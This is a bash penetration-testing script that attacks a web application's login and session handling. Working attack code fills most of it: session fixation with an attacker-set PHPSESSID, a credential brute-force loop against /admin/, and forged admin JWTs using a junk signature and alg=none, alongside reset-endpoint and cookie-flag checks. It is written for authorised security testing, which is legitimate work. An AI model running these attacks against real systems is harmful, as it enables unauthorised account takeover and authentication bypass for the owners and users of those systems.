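#!/bin/bash
# Red-team: Auth/session security — session fixation, token replay, brute force, MFA bypass
#
# Inputs (sourced from ../config.sh): TARGET, API_TARGET, OUT, BRUTE_CREDS ("user:pass" entries).
# Output: every probe result is appended to "$OUT/auth_session/summary.txt" and echoed to stdout.
#
# NOTE: `curl -k` deliberately disables TLS certificate verification (lab / self-signed
# targets). Only run against hosts you are authorised to test.
# NOTE: no `set -e` on purpose — several pipelines end in grep, which exits 1 on "no match"
# and would abort the run; each probe reports its own HTTP status instead.
# TODO(review): the title mentions MFA bypass but no MFA probe is implemented below.

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
# shellcheck source=../config.sh
source "$SCRIPT_DIR/../config.sh"

# Fail early with a readable message instead of sending requests to "" later on.
: "${TARGET:?TARGET must be set in config.sh}"
: "${API_TARGET:?API_TARGET must be set in config.sh}"
: "${OUT:?OUT must be set in config.sh}"

OUT="$OUT/auth_session"
mkdir -p "$OUT" || exit 1
SUMMARY="$OUT/summary.txt"
: > "$SUMMARY"

# Scratch files (cookie jar, captured headers/bodies) live in a private mktemp dir rather
# than fixed names under /tmp: fixed names are a clobber/symlink risk on shared hosts, and
# a world-readable jar would leave captured session cookies behind after the run.
SCRATCH="$(mktemp -d)" || exit 1
trap 'rm -rf -- "$SCRATCH"' EXIT

# log MESSAGE — append one line to the summary and echo it.
log() { printf '%s\n' "$*" | tee -a "$SUMMARY"; }

# http_code TIMEOUT URL [curl args...] — print only the HTTP status ("000" on connect failure).
http_code() {
  local timeout="$1" url="$2"
  shift 2
  curl -sk -o /dev/null -w '%{http_code}' --max-time "$timeout" "$@" "$url"
}

# b64url STRING — base64url-encode without padding (JWT segment encoding).
b64url() { printf '%s' "$1" | base64 | tr -d '\n=' | tr '+/' '-_'; }

log '=== AUTH & SESSION RED-TEAM ==='

# --- Session fixation -------------------------------------------------------------------
# Present an attacker-chosen PHPSESSID and then attempt a login with it. An application that
# does not issue a *new* session id on authentication is fixation-prone. The preset value is
# an arbitrary marker, not a real session. Caveat: rotation is only guaranteed to be observable
# on a successful login, so "no new id" with the dummy creds below is inconclusive — repeat
# with valid credentials before reporting.
log '--- Session Fixation ---'
FIXED_SID='ATTACKER_CONTROLLED_SESSION_12345'
code=$(http_code 10 "$TARGET/admin/" -H "Cookie: PHPSESSID=$FIXED_SID")
log "[$code] Preset PHPSESSID to attacker value"

fix_hdrs="$SCRATCH/fixation_headers.txt"
code=$(curl -sk -o /dev/null -D "$fix_hdrs" -w '%{http_code}' --max-time 10 \
  -H "Cookie: PHPSESSID=$FIXED_SID" \
  --data-urlencode 'username=admin' --data-urlencode 'password=test' \
  --data-urlencode 'submit=Login' "$TARGET/admin/")
# Extract the PHPSESSID value from the first Set-Cookie that carries one (CRs stripped).
new_sid=$(tr -d '\r' < "$fix_hdrs" | grep -i '^set-cookie: *PHPSESSID=' | head -1 \
  | sed -E 's/^[^=]*=([^;]*).*/\1/')
if [[ -z "$new_sid" ]]; then
  log "[$code] No new PHPSESSID issued on login attempt — inconclusive, re-test with valid creds"
elif [[ "$new_sid" == "$FIXED_SID" ]]; then
  log "[$code] Server re-issued the attacker-supplied PHPSESSID — session fixation likely"
else
  log "[$code] Server rotated PHPSESSID on login attempt — fixation mitigated for this flow"
fi

# --- Admin brute force ------------------------------------------------------------------
log ''
log '--- Admin Brute Force (top credentials) ---'
# Split each "user:pass" on the FIRST colon so a password containing ':' survives
# (the old ##*: expansion kept only the segment after the last colon).
# --data-urlencode keeps '&', '=', '+' and '%' in passwords from being mis-parsed as
# form syntax. Credentials are still visible in this process's argv (ps) per curl call.
jar="$SCRATCH/jar.txt"
body="$SCRATCH/login_body.txt"
for cred in "${BRUTE_CREDS[@]}"; do
  user="${cred%%:*}"
  pass="${cred#*:}"
  code=$(curl -sk -c "$jar" -o "$body" -w '%{http_code}' --max-time 10 \
    --data-urlencode "username=$user" --data-urlencode "password=$pass" \
    --data-urlencode 'submit=Login' "$TARGET/admin/")
  # Heuristic only: a 302 away from /admin/ after POST usually means the login succeeded;
  # the body keywords help tell an error page from a dashboard. Neither is proof.
  hint=$(grep -iE 'invalid|wrong|error|failed|logout|dashboard' "$body" 2>/dev/null | head -1 | cut -c1-60)
  log "[$code] $user:$pass | $hint"
  # Stop once the target throttles — further guesses only add noise and lockouts.
  if [[ "$code" == "429" ]]; then
    log "[$code] Rate limited — stopping brute force"
    break
  fi
done

# --- JWT replay / manipulation ----------------------------------------------------------
log ''
log '--- JWT Token Replay & Manipulation ---'
# jwt_probe TOKEN — send TOKEN as a Bearer credential to the API and print the status.
jwt_probe() {
  local token="$1"
  curl -sk -o /dev/null -w '%{http_code}' --max-time 10 \
    -H "Authorization: Bearer $token" -H 'Content-Type: application/json' \
    -d '{"data":"test"}' "$API_TARGET/encrypt"
}

# HS256 token with exp=1600000000 (in the past) — but its signature is NOT valid for this
# server's key, so a 401 proves only that *some* check failed: a verifier that checks the
# signature first never reaches the exp claim. To isolate expiry handling, capture a token
# signed with the real key from a legitimate session and wait for (or choose) an expired one.
EXPIRED_JWT='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxNjAwMDAwMDAwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c'
code=$(jwt_probe "$EXPIRED_JWT")
log "[$code] Expired JWT"

# HS256 token claiming sub=admin/role=admin with a junk signature ("badsignature" in base64).
# This tests whether the signature is verified at all — it is not a weak-secret guess.
# Anything other than a rejection means claims are trusted without verification.
WEAK_JWT='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImV4cCI6OTk5OTk5OTk5OX0.YmFkc2lnbmF0dXJl'
code=$(jwt_probe "$WEAK_JWT")
log "[$code] Crafted admin JWT (fake sig)"

# Same admin claims with alg=none and an empty signature segment (trailing '.'). Libraries
# that honour the token's own alg header accept this without any key.
NONE_JWT="$(b64url '{"alg":"none","typ":"JWT"}').$(b64url '{"sub":"admin","role":"admin","exp":9999999999}')."
code=$(jwt_probe "$NONE_JWT")
log "[$code] Crafted admin JWT (alg=none)"

# --- Password reset flow ----------------------------------------------------------------
# Exposure check only: a non-404 tells you the endpoint exists, nothing about its safety.
log ''
log '--- Password Reset Flow ---'
for path in '/reset-password' '/forgot-password' '/password-reset' '/api/reset' '/admin/reset'; do
  code=$(http_code 8 "$TARGET$path")
  log "[$code] $path"
done

# --- Cookie security flags --------------------------------------------------------------
log ''
log '--- Cookie Security Flags ---'
# Capture headers with -D instead of -I: -I makes curl a header-only request and many login
# handlers do not issue cookies for it. Each Set-Cookie is checked for the three attributes
# that matter for a session cookie: HttpOnly (no script access), Secure (HTTPS only) and
# SameSite (CSRF mitigation). Attributes are matched after a ';' so cookie *values* that
# happen to contain the words are not counted.
cookie_hdrs="$SCRATCH/cookie_headers.txt"
curl -sk -o /dev/null -D "$cookie_hdrs" --max-time 10 \
  --data-urlencode 'username=admin' --data-urlencode 'password=test' "$TARGET/admin/"
re_httponly=';[[:space:]]*httponly'
re_secure=';[[:space:]]*secure'
re_samesite=';[[:space:]]*samesite'
found=0
while IFS= read -r line; do
  found=1
  lc="${line,,}"
  missing=()
  [[ "$lc" =~ $re_httponly ]] || missing+=(HttpOnly)
  [[ "$lc" =~ $re_secure ]]   || missing+=(Secure)
  [[ "$lc" =~ $re_samesite ]] || missing+=(SameSite)
  if (( ${#missing[@]} > 0 )); then
    log "$line | MISSING: ${missing[*]}"
  else
    log "$line | all flags present"
  fi
done < <(tr -d '\r' < "$cookie_hdrs" | grep -i '^set-cookie:')
(( found )) || log 'No Set-Cookie header in login response'

# Final dump for callers that only read stdout at the end (tee already echoed each line).
cat "$SUMMARY"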